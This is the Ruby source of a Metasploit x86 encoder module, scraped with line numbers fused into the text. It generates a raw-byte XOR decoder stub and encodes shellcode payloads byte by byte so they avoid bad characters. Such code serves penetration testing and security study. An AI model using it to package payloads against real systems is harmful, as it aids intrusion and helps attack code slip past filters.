Path: blob/master/modules/encoders/x86/countdown.rb
19500 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Encoder::Xor67def initialize8super(9'Name' => 'Single-byte XOR Countdown Encoder',10'Description' => %q{11This encoder uses the length of the payload as a position-dependent12encoder key to produce a small decoder stub.13},14'Author' => 'vlad902',15'Arch' => ARCH_X86,16'License' => MSF_LICENSE,17'Decoder' => {18'BlockSize' => 119})20end2122#23# Returns the decoder stub that is adjusted for the size of the buffer24# being encoded.25#26def decoder_stub(state)27# Sanity check that saved_registers doesn't overlap with modified_registers28if !(modified_registers & saved_registers).empty?29raise BadGenerateError30end3132begin33decoder =34Rex::Arch::X86.set(35Rex::Arch::X86::ECX,36state.buf.length - 1,37state.badchars38) +39"\xe8\xff\xff\xff" + # call $+440"\xff\xc1" + # inc ecx41"\x5e" + # pop esi42"\x30\x4c\x0e\x07" + # xor_loop: xor [esi + ecx + 0x07], cl43"\xe2\xfa" # loop xor_loop4445# Initialize the state context to 146state.context = 147rescue RuntimeError => e48raise BadcharError if e.message == 'No valid set instruction could be created!'49end50return decoder51end5253#54# Encodes a one byte block with the current index of the length of the55# payload.56#57def encode_block(state, block)58state.context += 15960[ block.unpack('C')[0] ^ (state.context - 1) ].pack('C')61end6263# Indicate that this module can preserve some registers64def can_preserve_registers?65true66end6768# A list of registers always touched by this encoder69def modified_registers70[ Rex::Arch::X86::ECX, Rex::Arch::X86::ESI ]71end7273# Convert the SaveRegisters to an array of x86 register constants74def saved_registers75Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters'])76end77end787980